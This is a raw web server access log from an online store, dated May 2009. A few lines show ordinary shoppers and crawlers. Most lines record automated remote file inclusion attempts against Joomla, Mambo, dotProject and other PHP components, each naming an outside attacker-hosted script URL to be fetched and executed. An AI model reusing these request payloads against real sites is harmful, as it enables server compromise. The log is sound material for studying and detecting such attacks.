87.51.48.38 - - [19/May/2009:02:39:22 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1073994D2D219900215D09S+M37+ENG HTTP/1.1" 200 49494 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1073994923411900152D09S+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
87.51.48.38 - - [19/May/2009:02:39:23 -0400] "GET /images/items/5096000_THUMB.JPG HTTP/1.1" 200 2069 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1073994D2D219900215D09S+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
87.51.48.38 - - [19/May/2009:02:39:59 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1073994D2D219900215D09S+M37+ENG HTTP/1.1" 200 59459 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1073994923411900152D09S+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
87.51.48.38 - - [19/May/2009:02:40:00 -0400] "GET /images/items/0034196_THUMB.JPG HTTP/1.1" 200 2152 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1073994D2D219900215D09S+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
87.51.48.38 - - [19/May/2009:02:40:00 -0400] "GET /images/items/9600305_THUMB.JPG HTTP/1.1" 200 3031 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1073994D2D219900215D09S+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
209.59.12.99 - - [19/May/2009:02:40:33 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.72.114 - - [19/May/2009:02:41:38 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L002981419EA096008C3C091+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
210.143.109.236 - - [19/May/2009:02:43:58 -0400] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.proinex.cz/tmp/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
210.143.109.236 - - [19/May/2009:02:43:58 -0400] "GET /logs/access_log.Q109011700/components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.proinex.cz/tmp/id1.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
210.143.109.236 - - [19/May/2009:02:43:58 -0400] "GET /logs/components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.proinex.cz/tmp/id1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
210.143.109.236 - - [19/May/2009:02:44:33 -0400] "GET /logs/access_log.Q109011700%20%20/components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.proinex.cz/tmp/id1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:02:44:57 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:02:44:57 -0400] "GET /logs/access_log.Q109020100//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:02:45:02 -0400] "GET /logs/access_log.Q109020100//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:02:45:06 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:02:45:06 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:02:45:07 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:02:45:08 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:02:45:08 -0400] "GET /logs/access_log.Q109020100//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:02:45:08 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
209.59.12.99 - - [19/May/2009:02:45:33 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.147.29.190 - - [19/May/2009:02:45:49 -0400] "GET /logs/access_log.Q109020100%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
210.143.109.236 - - [19/May/2009:02:46:02 -0400] "GET /logs/access_log.Q108052400%20%20/components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.proinex.cz/tmp/id1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:02:46:34 -0400] "GET /logs/access_log.Q109020100%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:02:47:39 -0400] "GET /logs/access_log.Q109020100%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:02:48:03 -0400] "GET /logs/access_log.Q109011400//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.147.29.190 - - [19/May/2009:02:48:03 -0400] "GET /logs/access_log.Q109050700//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.30.79.49 - - [19/May/2009:02:48:48 -0400] "GET /logs/access_log.Q109022200 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
65.98.59.178 - - [19/May/2009:02:48:51 -0400] "GET //dotproject//includes/db_connect.php?baseDir=http://h1.ripway.com/roni121/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
65.98.59.178 - - [19/May/2009:02:48:51 -0400] "GET /logs//dotproject//includes/db_connect.php?baseDir=http://h1.ripway.com/roni121/id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
65.98.59.178 - - [19/May/2009:02:48:54 -0400] "GET /logs/access_log.Q108110900%20%20//dotproject//includes/db_connect.php?baseDir=http://h1.ripway.com/roni121/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
65.98.59.178 - - [19/May/2009:02:49:25 -0400] "GET //dotproject//includes/db_connect.php?baseDir=http://h1.ripway.com/roni121/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
65.98.59.178 - - [19/May/2009:02:49:25 -0400] "GET /logs//dotproject//includes/db_connect.php?baseDir=http://h1.ripway.com/roni121/id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
65.98.59.178 - - [19/May/2009:02:49:26 -0400] "GET /logs/access_log.Q108110900%20%20//dotproject//includes/db_connect.php?baseDir=http://h1.ripway.com/roni121/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
72.52.230.168 - - [19/May/2009:02:49:52 -0400] "GET /logs/error_log.Q108051600//includes/db_adodb.php?baseDir=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
190.144.44.36 - - [19/May/2009:02:49:58 -0400] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
190.144.44.36 - - [19/May/2009:02:49:58 -0400] "GET /logs/access_log.Q108122500//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
190.144.44.36 - - [19/May/2009:02:49:58 -0400] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
62.146.68.61 - - [19/May/2009:02:50:16 -0400] "GET //administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
62.146.68.61 - - [19/May/2009:02:50:16 -0400] "GET /logs/access_log.Q108082900//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 299 "-" "Mozilla/5.0"
62.146.68.61 - - [19/May/2009:02:50:16 -0400] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
62.146.68.61 - - [19/May/2009:02:50:16 -0400] "GET /logs/access_log.Q108090200//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 299 "-" "Mozilla/5.0"
62.146.68.61 - - [19/May/2009:02:50:17 -0400] "GET //administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
62.146.68.61 - - [19/May/2009:02:50:17 -0400] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
62.146.68.61 - - [19/May/2009:02:50:17 -0400] "GET /logs/access_log.Q108082900//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 299 "-" "Mozilla/5.0"
62.146.68.61 - - [19/May/2009:02:50:17 -0400] "GET /logs/access_log.Q108090200//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 299 "-" "Mozilla/5.0"
62.146.68.61 - - [19/May/2009:02:50:19 -0400] "GET //administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
62.146.68.61 - - [19/May/2009:02:50:19 -0400] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
62.146.68.61 - - [19/May/2009:02:50:19 -0400] "GET /logs/access_log.Q108082900%20%20//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
62.146.68.61 - - [19/May/2009:02:50:20 -0400] "GET /logs/access_log.Q108090200%20%20//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
62.146.68.61 - - [19/May/2009:02:50:21 -0400] "GET //administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
62.146.68.61 - - [19/May/2009:02:50:21 -0400] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
62.146.68.61 - - [19/May/2009:02:50:21 -0400] "GET /logs/access_log.Q108082900%20%20//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
62.146.68.61 - - [19/May/2009:02:50:21 -0400] "GET /logs/access_log.Q108090200%20%20//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
62.146.68.61 - - [19/May/2009:02:50:28 -0400] "GET //administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
62.146.68.61 - - [19/May/2009:02:50:28 -0400] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
62.146.68.61 - - [19/May/2009:02:50:28 -0400] "GET /logs/access_log.Q108082900//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 299 "-" "Mozilla/5.0"
209.59.12.99 - - [19/May/2009:02:50:34 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
62.146.68.61 - - [19/May/2009:02:50:37 -0400] "GET //administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
62.146.68.61 - - [19/May/2009:02:50:37 -0400] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
62.146.68.61 - - [19/May/2009:02:50:37 -0400] "GET /logs/access_log.Q108082900//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 299 "-" "Mozilla/5.0"
62.146.68.61 - - [19/May/2009:02:51:13 -0400] "GET //administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
62.146.68.61 - - [19/May/2009:02:51:13 -0400] "GET //administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
72.52.230.168 - - [19/May/2009:02:51:30 -0400] "GET /logs/error_log.Q109050400//tools/send_reminders.php?noSet=0&includedir=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
200.93.147.154 - - [19/May/2009:02:51:32 -0400] "GET //dotproject//includes/db_connect.php?baseDir=http://h1.ripway.com/roni121/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
200.93.147.154 - - [19/May/2009:02:51:32 -0400] "GET /logs//dotproject//includes/db_connect.php?baseDir=http://h1.ripway.com/roni121/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
200.93.147.154 - - [19/May/2009:02:51:32 -0400] "GET /logs/access_log.Q108110900%20%20//dotproject//includes/db_connect.php?baseDir=http://h1.ripway.com/roni121/id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
62.146.68.61 - - [19/May/2009:02:51:38 -0400] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
62.146.68.61 - - [19/May/2009:02:51:38 -0400] "GET /logs/access_log.Q108082900//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 299 "-" "Mozilla/5.0"
72.52.230.168 - - [19/May/2009:02:51:43 -0400] "GET /logs/access_log.Q108090900//tools/send_reminders.php?noSet=0&includedir=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
62.146.68.61 - - [19/May/2009:02:51:44 -0400] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
62.146.68.61 - - [19/May/2009:02:51:44 -0400] "GET /logs/access_log.Q108082900//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 299 "-" "Mozilla/5.0"
62.141.54.240 - - [19/May/2009:02:51:47 -0400] "GET /config.php?path_to_root=http://www.geocities.com/bozot87/irc/1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
62.141.54.240 - - [19/May/2009:02:51:47 -0400] "GET /logs/config.php?path_to_root=http://www.geocities.com/bozot87/irc/1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
62.141.54.240 - - [19/May/2009:02:51:47 -0400] "GET /logs/access_log.Q109022600%20%20/config.php?path_to_root=http://www.geocities.com/bozot87/irc/1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
62.141.54.240 - - [19/May/2009:02:51:47 -0400] "GET /logs/access_log.Q108120600%20%20/config.php?path_to_root=http://www.geocities.com/bozot87/irc/1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
65.98.59.178 - - [19/May/2009:02:51:55 -0400] "GET /logs//include/lib.inc.php?site_path=http://h1.ripway.com/roni121/id1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
65.98.59.178 - - [19/May/2009:02:51:55 -0400] "GET /logs/access_log.Q109050900%20%20//include/lib.inc.php?site_path=http://h1.ripway.com/roni121/id1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
65.98.59.178 - - [19/May/2009:02:51:55 -0400] "GET //include/lib.inc.php?site_path=http://h1.ripway.com/roni121/id1.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
65.98.59.178 - - [19/May/2009:02:52:00 -0400] "GET /logs/access_log.Q109050700%20%20//include/lib.inc.php?site_path=http://h1.ripway.com/roni121/id1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
190.144.44.36 - - [19/May/2009:02:52:03 -0400] "GET /logs/access_log.Q108122500//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
190.144.44.36 - - [19/May/2009:02:52:03 -0400] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
190.144.44.36 - - [19/May/2009:02:52:03 -0400] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
60.48.93.182 - - [19/May/2009:02:52:05 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
60.48.93.182 - - [19/May/2009:02:52:05 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
60.48.93.182 - - [19/May/2009:02:52:05 -0400] "GET /logs/access_log.Q108082200//index.php?DOCUMENT_ROOT=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
62.141.54.240 - - [19/May/2009:02:52:19 -0400] "GET /logs/access_log.Q108120600/config.php?path_to_root=http://www.geocities.com/bozot87/irc/1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
62.141.54.240 - - [19/May/2009:02:52:24 -0400] "GET /logs/access_log.Q109022600/config.php?path_to_root=http://www.geocities.com/bozot87/irc/1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
62.146.68.61 - - [19/May/2009:02:52:28 -0400] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
62.146.68.61 - - [19/May/2009:02:52:28 -0400] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
62.146.68.61 - - [19/May/2009:02:52:28 -0400] "GET /logs/access_log.Q108052400//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
62.146.68.61 - - [19/May/2009:02:52:30 -0400] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
62.146.68.61 - - [19/May/2009:02:52:30 -0400] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
62.146.68.61 - - [19/May/2009:02:52:30 -0400] "GET /logs/access_log.Q108052400//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
62.146.68.61 - - [19/May/2009:02:52:33 -0400] "GET /logs/access_log.Q109022800//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
62.146.68.61 - - [19/May/2009:02:52:34 -0400] "GET /logs/access_log.Q109022800//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
72.52.230.168 - - [19/May/2009:02:53:00 -0400] "GET /?sourcedir=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
72.52.230.168 - - [19/May/2009:02:53:01 -0400] "GET /logs/error_log.Q108070200/?sourcedir=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
72.52.230.168 - - [19/May/2009:02:53:01 -0400] "GET /logs/?sourcedir=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 200 1954 "-" "Mozilla/5.0"
72.52.230.168 - - [19/May/2009:02:53:20 -0400] "GET /logs/access_log.Q108090500/?sourcedir=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
88.191.103.144 - - [19/May/2009:02:53:26 -0400] "GET /?sourcedir=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
88.191.103.144 - - [19/May/2009:02:53:26 -0400] "GET /logs/error_log.Q108070200/?sourcedir=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
88.191.103.144 - - [19/May/2009:02:53:26 -0400] "GET /logs/?sourcedir=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 200 1954 "-" "Mozilla/5.0"
121.165.73.157 - - [19/May/2009:02:53:29 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://208.98.22.241/id.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
121.165.73.157 - - [19/May/2009:02:53:29 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://208.98.22.241/id.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
121.165.73.157 - - [19/May/2009:02:53:29 -0400] "GET /logs/access_log.Q108082200//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://208.98.22.241/id.txt?? HTTP/1.1" 404 267 "-" "libwww-perl/5.805"
88.191.103.144 - - [19/May/2009:02:53:47 -0400] "GET /logs/access_log.Q108090500/?sourcedir=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
62.146.68.61 - - [19/May/2009:02:53:50 -0400] "GET /logs/access_log.Q108052400%20%20//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
62.146.68.61 - - [19/May/2009:02:53:51 -0400] "GET /logs/access_log.Q109022800%20%20//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
62.146.68.61 - - [19/May/2009:02:53:53 -0400] "GET /logs/access_log.Q108052400%20%20//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
62.146.68.61 - - [19/May/2009:02:53:53 -0400] "GET /logs/access_log.Q109022800%20%20//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
72.52.230.168 - - [19/May/2009:02:53:58 -0400] "GET /logs/error_log.Q108070200%20%20/?sourcedir=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
88.191.103.144 - - [19/May/2009:02:53:59 -0400] "GET /logs/error_log.Q108070200%20%20/?sourcedir=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
121.165.73.157 - - [19/May/2009:02:54:15 -0400] "GET /logs/access_log.Q108090400//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://208.98.22.241/id.txt?? HTTP/1.1" 404 267 "-" "libwww-perl/5.805"
65.98.59.178 - - [19/May/2009:02:54:41 -0400] "GET /logs/access_log.Q108110900//dotproject//includes/db_connect.php?baseDir=http://h1.ripway.com/roni121/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
